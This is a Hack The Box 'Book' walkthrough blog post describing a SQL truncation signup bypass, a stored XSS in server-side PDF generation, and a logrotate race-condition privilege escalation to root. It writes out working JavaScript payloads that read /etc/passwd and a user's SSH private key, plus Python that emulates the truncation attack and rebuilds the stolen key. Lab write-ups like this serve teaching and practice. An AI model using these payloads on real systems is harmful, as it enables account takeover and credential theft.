BOOK — HTB walkthrough

Dhanishtha Awasthi
6 min read · Jul 11, 2020

Stored XSS. Logrotate.

ENUMERATION

nmap scan for services and ports

Trial and Error

  1. Enumerated the whole website.
  2. Signed in as abcd@example.com with password abcd.
  3. Uploaded files; they cannot be accessed.
  4. Downloaded pages to create a wordlist and ran Intruder.
  5. Dirbuster revealed the Admin and login pages.
Dirbuster Scan

  6. Nikto scan revealed the same as Dirbuster, nothing much.

nikto scan results

  7. Downloaded PDFs: nothing of importance. Tried password cracking using a wordlist, which was of no use. I did not find anything using brute force. I initially tried to sign up as admin but was not allowed to; it showed that the user already exists.

LOGGING IN

  1. First, try to sign up using the name admin and the email admin@book.htb, and intercept the request.
  2. The request seems normal, but in the page source there is JavaScript validation that rejects a name longer than 10 characters and an email longer than 20 characters.

So the trick here was: pad the email field with spaces up to 20 characters and then add an arbitrary character.

REASON for doing so (this is the classic SQL truncation attack)

  1. The email cannot be more than 20 characters: the client-side limit mirrors the length of the database column.
  2. The extra character at the end (the 21st) makes our submitted email differ from the existing admin@book.htb, so the server's "does this user already exist" check passes.
  3. On insert, the database truncates the value to 20 characters, dropping the 21st character. Trailing spaces are ignored when strings are compared (the default behaviour of MySQL's collations), so the stored email is treated as equal to admin@book.htb.
  4. This leaves us with a second account whose name is admin and whose email is admin@book.htb.

So now we can log in to the site as admin.

Now I tried uploading an arbitrary payload file in Collections. It got uploaded but still showed "requires approval", so I looked at the "View Profile" part and found we were still USERS.

Now I tried updating it using Update and intercepting the request like this:

But it just showed an "updated" pop-up and did not update anything in the background, because there were two users with the same name. So I tried signing up as another user.

Make it name=admin2&email=admin@book.htb      A&password=12345 (admin@book.htb is 14 characters, so six spaces bring it to 20, followed by the extra A).

NOTES

  1. Change the username, as a user named admin is already present.
  2. Change the password, because the combination email admin@book.htb / password admin already exists from the previous signup.

Now log in with admin@book.htb and the new password, and we are admin.
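As an added example (my code, not from the original post or the box), here is a Python emulation of the signup bypass above: the duplicate-user check sees the padded 21-character email, the insert silently truncates it to the column length, and trailing spaces are ignored on comparison. The 20-character column length is assumed from the client-side limit, the table model is a toy, and the hardened variant shows the two server-side fixes.

```python
# Added example: emulation of the SQL truncation signup bypass described above.
# The 20-character column length is an assumption taken from the client-side limit.
EMAIL_COL_LEN = 20


def truncation_payload(target_email: str, col_len: int = EMAIL_COL_LEN, tail: str = "A") -> str:
    """Pad target_email with spaces to exactly col_len characters, then append tail.

    The result differs byte-for-byte from target_email, so a naive "does this user
    exist" lookup finds nothing, but truncation to col_len on INSERT leaves only
    target_email plus trailing spaces.
    """
    if len(target_email) >= col_len:
        raise ValueError("target email must be shorter than the column")
    return target_email.ljust(col_len) + tail


class VulnerableUserTable:
    """Toy model of the observed server behaviour (an assumption, not the box's code):
    duplicate check on the raw input, silent truncation on insert, and string
    comparison that ignores trailing spaces (MySQL PAD SPACE collation semantics)."""

    ADMIN_EMAIL = "admin@book.htb"

    def __init__(self, col_len: int = EMAIL_COL_LEN):
        self.col_len = col_len
        self.rows = []  # (name, stored_email, password)

    @staticmethod
    def _db_equal(a: str, b: str) -> bool:
        return a.rstrip(" ") == b.rstrip(" ")

    def signup(self, name: str, email: str, password: str) -> bool:
        if any(n == name or self._db_equal(e, email) for n, e, _ in self.rows):
            return False  # "user exists"
        self.rows.append((name, email[: self.col_len], password))  # silent truncation
        return True

    def login(self, email: str, password: str):
        """Return the email the app will act on, or None if no row matches."""
        for _, stored, pw in self.rows:
            if self._db_equal(stored, email) and pw == password:
                return stored.rstrip(" ")
        return None

    def is_admin(self, email: str) -> bool:
        return email == self.ADMIN_EMAIL


class HardenedUserTable(VulnerableUserTable):
    """Same table with the two server-side fixes: reject over-length or
    space-padded input before it reaches the database, and compare the exact
    submitted string instead of relying on the database's padding rules."""

    def signup(self, name: str, email: str, password: str) -> bool:
        if len(email) > self.col_len or email != email.strip():
            return False
        if any(n == name or e == email for n, e, _ in self.rows):
            return False
        self.rows.append((name, email, password))
        return True


if __name__ == "__main__":
    table = VulnerableUserTable()
    table.signup("admin", "admin@book.htb", "unknown-real-password")
    payload = truncation_payload("admin@book.htb")
    print("signup admin2 with %r ->" % payload, table.signup("admin2", payload, "12345"))
    who = table.login("admin@book.htb", "12345")
    print("login as admin@book.htb/12345 ->", who, "admin:", table.is_admin(who))
```

The same idea applies to the name field (10-character limit) if the application compared on name instead; the fix that matters is the server-side length check, since running MySQL in STRICT mode would also turn the silent truncation into an error.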

EXPLOITATION

We have Users, which lists all the HTB users who have tried signing up. Let's look at what tricks others are trying, just for fun.

Now I went to the Collections part to see if our already-uploaded PDF still required approval. It did not, and the page included two things:

  1. Users data
  2. Collections data

On viewing the contents there were links to PDFs, so I uploaded a new payload named abcd.php using the user account, and in the admin account went to download that collection's PDF and found a link to my uploaded file.

The link was http://book.htb/docs/70621.pdf

Now we see that we need to add book.htb to our /etc/hosts.

Try opening the doc.

OK, so we see that anything we upload, in any format, gets renamed to a random number with a .pdf extension. On viewing the source of the page, it was the payload I created, but it did not get executed.

Now, looking at it, only PDF content is ever rendered for us.

  1. The file we upload is renamed to a random number with a .pdf extension, and the PDF the admin downloads from Collections is generated on the server from the submitted book data (title, author), not served from our upload as-is.
  2. So we can put HTML/JavaScript into those fields: it is rendered on the server during PDF generation (a stored XSS inside a dynamically generated PDF), and a script running there can read local files on the server and write their contents into the PDF.

OK, let's see if we can exploit this to read a file from the server, something like /etc/passwd.

Request file:///etc/passwd. The technique is described at https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html; I did the same, making the request via XHR (XMLHttpRequest):

<script>x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText)}; x.open("GET","file:///etc/passwd"); x.send(); </script>

Pasted this in the book name field and the author field, then uploaded an arbitrary PDF file. As admin, went to Collections and downloaded the PDF. Opening the PDF gave me:

Now we need a shell. We will read the SSH private key of the user reader the same way:

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>

Convert this to text, store it as id_rsa and use it to ssh reader@book.htb.

I used pdf2txt from pdfminer.six on GitHub (downloaded and stored in /opt/pdfminer.six):

  • python tools/pdf2txt.py 90137.pdf > id_rsa
  • cp id_rsa ~/Downloads/htb/BOOK
  • chmod 0700 id_rsa
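Text extracted from a PDF does not always come out as a usable key file: pdf2txt can insert spaces, short line breaks and form feeds into the base64 body. As an added helper (my code, not from the post or from pdfminer), the script below pulls the first PEM private key out of pdf2txt output, strips all whitespace from the body, checks that it is valid base64 and re-wraps it at 64 columns. The sample input is a constructed fake key body, not a real key.

```python
# Added example: rebuild a PEM private key from pdf2txt output.
import base64
import re

# Matches RSA/EC/OPENSSH/PKCS#8 private-key headers and the matching footer.
KEY_RE = re.compile(r"-----BEGIN ([A-Z0-9 ]*PRIVATE KEY)-----(.*?)-----END \1-----", re.S)
B64_LINE = 64  # PEM body line width


def reconstruct_private_key(text: str) -> str:
    """Extract the first PEM private key from text, drop every whitespace character
    inside the body, validate it as base64 and re-wrap it at 64 columns."""
    m = KEY_RE.search(text)
    if not m:
        raise ValueError("no PEM private key found")
    label, raw_body = m.group(1), m.group(2)
    body = re.sub(r"\s+", "", raw_body)  # spaces, newlines and form feeds from pdf2txt
    if re.search(r"[^A-Za-z0-9+/=]", body):
        raise ValueError("key body contains non-base64 characters")
    base64.b64decode(body, validate=True)  # raises binascii.Error (a ValueError) if corrupt
    lines = [body[i : i + B64_LINE] for i in range(0, len(body), B64_LINE)]
    return "\n".join([f"-----BEGIN {label}-----", *lines, f"-----END {label}-----"]) + "\n"


# Constructed sample: a fake key body (not a real key) mangled the way pdf2txt
# output often looks, with page text, extra spaces, short lines and a form feed.
SAMPLE_B64 = base64.b64encode(bytes(range(96))).decode()  # 128 base64 characters


def _garble(s: str) -> str:
    out = []
    for i, ch in enumerate(s):
        out.append(ch)
        if i % 11 == 10:
            out.append(" ")
        if i % 37 == 36:
            out.append("\n")
    return "".join(out)


SAMPLE_PDF2TXT_OUTPUT = (
    "Book collection\n\n-----BEGIN RSA PRIVATE KEY-----\n"
    + _garble(SAMPLE_B64)
    + "\n\x0c-----END RSA PRIVATE KEY-----\n\x0c"
)

if __name__ == "__main__":
    print(reconstruct_private_key(SAMPLE_PDF2TXT_OUTPUT), end="")
```

After writing the result to id_rsa, chmod 600 it and run ssh-keygen -l -f id_rsa: if the key parses, it prints the fingerprint, and only then is it worth trying ssh -i id_rsa reader@book.htb.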
Getting the shell

PRIVILEGE ESCALATION

reader@book:~/backups$ cat access.log.1

Let's enumerate processes.

Linux enumeration: ran lse.sh to find disclosed vulnerabilities and went through the results one by one. Found logrotate present in cron.daily.

On enumeration I found logrotate's state file, /var/lib/logrotate/status, which records when each log file was last rotated.

I was not able to find any process running with root privileges containing logrotate, so I took a hint, in case I was doing the wrong thing and the escalation did not need to be done this way.

pspy helped me find processes that are not visible to my user.

pspy showing hidden processes

You can see here /usr/sbin/logrotate -f /root/log.cfg running every few minutes.

LOGROTATE Exploitation

Brief description (as given in the logrotten exploit's README)

  • logrotate is prone to a race condition after renaming the logfile.
  • If logrotate is executed as root, with an option that creates a file (like create, copy, compress, etc.) and the user is in control of the logfile path, it is possible to abuse a race condition to write files in ANY directory.
  • An attacker could elevate their privileges by writing reverse shells into directories like "/etc/bash_completion.d/".

What is logrotate? From its man page: logrotate rotates, compresses, and mails system logs.
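The preconditions in that description are checkable from the config alone: root runs logrotate, a stanza uses a file-creating directive, and the log path sits somewhere a non-root user controls. As an added check (my code, not from the post or from logrotten), the script below parses a logrotate config and flags such stanzas. The sample config and the fake file ownership are constructed to mirror this box (root's cron running logrotate -f /root/log.cfg over a log in reader's backups directory); the real /root/log.cfg is not shown on the page, so its directives are an assumption.

```python
# Added example: flag logrotate stanzas that match the logrotten preconditions.
import os
import stat
from typing import Callable, Dict, List, Optional, Tuple

# Directives that make logrotate create a new file in the log's directory.
FILE_CREATING = {"create", "copy", "copytruncate", "compress", "delaycompress"}

Stanza = Tuple[List[str], List[str]]  # (log paths, directive names)
Lookup = Callable[[str], Optional[Tuple[int, int]]]  # path -> (uid, mode) or None


def parse_logrotate_config(text: str) -> List[Stanza]:
    """Parse the '<paths> { <directives> }' stanzas of a logrotate config.
    Comments are stripped; global directives outside a stanza are ignored."""
    stanzas: List[Stanza] = []
    paths: List[str] = []
    directives: List[str] = []
    inside = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if not inside:
            if line.endswith("{"):
                paths, directives, inside = line[:-1].split(), [], True
            continue
        if line == "}":
            stanzas.append((paths, directives))
            inside = False
        else:
            directives.append(line.split()[0])
    return stanzas


def fs_lookup(path: str) -> Optional[Tuple[int, int]]:
    """Real filesystem lookup used when no fake is supplied."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_mode


def user_controls_path(path: str, lookup: Lookup) -> bool:
    """Conservative test: a non-root user owns the log or its directory, or the
    directory is group/world writable, so they can swap the log for a symlink
    or race its rename."""
    for p in (path, os.path.dirname(path) or "/"):
        info = lookup(p)
        if info is None:
            continue
        uid, mode = info
        if uid != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
            return True
    return False


def risky_stanzas(config_text: str, lookup: Lookup = fs_lookup) -> List[Tuple[str, List[str]]]:
    """(log path, file-creating directives) for each stanza where root would
    create files next to a log that a non-root user controls."""
    findings = []
    for paths, directives in parse_logrotate_config(config_text):
        creating = sorted(set(directives) & FILE_CREATING)
        if not creating:
            continue
        for p in paths:
            if user_controls_path(p, lookup):
                findings.append((p, creating))
    return findings


# Constructed sample modelled on /root/log.cfg as seen through pspy (assumed contents).
SAMPLE_CONFIG = """
/home/reader/backups/access.log {
    daily
    rotate 12
    missingok
    notifempty
    size 1k
    create
}
/var/log/syslog {
    weekly
    rotate 4
    compress
    create 0640 root adm
}
"""

# Constructed ownership/mode table standing in for os.stat on the box.
FAKE_FS: Dict[str, Tuple[int, int]] = {
    "/home/reader/backups/access.log": (1000, 0o100644),
    "/home/reader/backups": (1000, 0o040755),
    "/var/log/syslog": (0, 0o100640),
    "/var/log": (0, 0o040755),
}

if __name__ == "__main__":
    for path, directives in risky_stanzas(SAMPLE_CONFIG, FAKE_FS.get):
        print(f"{path}: rotated by root with {directives} but under user control")
```

Run against a real host with risky_stanzas(open("/etc/logrotate.conf").read()) and the files under /etc/logrotate.d; the syslog stanza is deliberately left unflagged to show that root-owned logs in root-owned directories do not meet the precondition.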

Resource on how to exploit it:

SSH in to get a first terminal, where we will run the exploit.

Then, on another terminal, ssh reader@book.htb and write something to access.log so that its size increases and logrotate rotates it.

Writing 10000 A's to access.log so that the log is rotated and we get a shell

Back on the first terminal you will see:

Log rotation is done

And on the terminal where we ran our netcat listener:

The shell is quite unstable, so just cat out root.txt. ROOTED!!!!
